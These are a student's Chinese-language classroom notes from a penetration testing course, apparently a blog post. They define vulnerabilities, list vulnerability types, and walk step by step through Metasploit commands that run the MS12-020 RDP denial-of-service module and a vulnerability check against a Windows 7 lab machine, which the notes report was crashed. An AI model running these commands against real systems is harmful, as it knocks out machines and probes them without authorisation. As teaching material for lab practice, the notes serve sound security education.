《网络安全与渗透测试》课堂笔记---04

2019/4/16- - -
关于操作系统的漏洞
主要讲解利用kali linux 中Metasploit工具对Windows7系统的已知漏洞进行攻击。
包括知识点有漏洞的定义、Metasploit的介绍与使用、Metasploit详细攻击介绍
一、何为漏洞？

漏洞（hole）是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，
				从而可以使攻击者能够在未授权的情况下访问或破坏系统。

漏洞的分类：

HTTP 参数污染
后门
Cookie 验证错误
跨站请求伪造
ShellCode
SQL 注入
任意文件下载
任意文件创建
任意文件删除
任意文件读取
其他类型
变量覆盖
命令执行
嵌入恶意代码
弱密码
拒绝服务
数据库发现
文件上传
远程文件包含
本地溢出
权限提升
信息泄漏
登录绕过
目录穿越
解析错误
越权访问
跨站脚本
路径泄漏
代码执行
远程密码修改
远程溢出
目录遍历
空字节注入
中间人攻击
格式化字符串
缓冲区溢出
HTTP 请求拆分
CRLF 注入
XML 注入
本地文件包含
证书预测
HTTP 响应拆分
SSI 注入
内存溢出
整数溢出
HTTP 响应伪造
HTTP 请求伪造
内容欺骗
XQuery 注入
缓存区过读
暴力破解
LDAP 注入
安全模式绕过
备份文件发现
XPath 注入
URL 重定向
代码泄漏
释放后重用
DNS 劫持
错误的输入验证
通用跨站脚本
服务器端请求伪造
跨域漏洞
错误的证书验证

二、Metasploit的介绍与使用

主要是利用已知的漏洞对目标系统加以利用

工具所在位置：

在应用程序  ---> 08-漏洞利用工具集-->metasploit

三、Metasploit详细攻击介绍
环境准备：
一台kali linux
一台Windows7
他们在同一个网段
windows7具备以下功能：
1、能和kali linux ping通(确保Windows7的防火墙关闭)

2、远程桌面开启
扫描这个Windows7的已知漏洞MS12-020
在kali linux 中

终端内输入：msfconsole

打开Metasploit工具，也可以用上面的办法打开

输入下列命令

search ms12-020		#注释：扫描之后发现存在两个问题，分别是DOS攻击和远程桌面攻击
use  auxiliary/dos/windows/rdp/ms12_020_maxchanne	#注释：先使用第一个漏洞，DOS攻击
show options		显示选项
set rhosts 192.168.247.20	#注释：修改参数，加入目标windows7的ip地址
show options		#注释：再看一下有啥不同之处
run					#注释：运行这个模块

看一下Windows7，发现蓝屏了，说明攻击成功了。

再测试一下远程桌面是否存在漏洞
输入命令

msfconsole		#注释：打开Metasploit
search ms12-020		#注释：扫描ms12-020
use  auxiliary/scanner/rdp/ms12_020_check	#注释：使用这个漏洞
show options		显示选项
set rhosts 192.168.247.20	#注释：修改参数，加入目标windows7的ip地址
show options		#注释：再看一下有啥不同之处
run					#注释：运行这个模块

出现The target is vulnerable(目标很脆弱).字样即为存在远程桌面可能允许远程执行代码。

OK，再附录一张端口的详细说明有什么问题，欢迎评论(*￣︶￣)